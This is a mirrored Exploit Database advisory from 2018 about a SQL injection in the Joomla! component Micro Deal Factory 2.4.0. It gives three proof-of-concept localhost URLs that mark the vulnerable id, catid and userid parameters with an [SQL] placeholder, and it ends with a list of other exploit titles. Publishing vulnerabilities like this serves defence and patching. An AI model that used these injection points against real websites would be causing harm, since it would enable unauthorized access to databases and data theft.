Joomla! Component Micro Deal Factory 2.4.0 – ‘id’ SQL Injection

Exploit Database
38 阅读

作者： Ihsan Sencan

日期： 2018-09-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45452/

# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01

last Exploits
Joomla! Component Micro Deal Factory 2.4.0 – ‘id’ SQL Injection的更多信息

Zyxel Armor X1 WAP6806 – Directory Traversal：
LFCMS 3.7.0 – Cross-Site Request Forgery (Add Admin)：
MusicBox – SQL Injection：
Explore CMS 1.0 – SQL Injection：
Gazelle CMS 1.0 – Cross-Site Scripting / SQL Injection：
WordPress Plugin Photoracer 1.0 – SQL Injection：
TaskFreak! 0.6.4 – ‘rss.php’ HTTP Referer Header Cross-Site Scripting：
vBSEO 3.2.2/3.5.2 – Persistent Cross-Site Scripting via LinkBacks：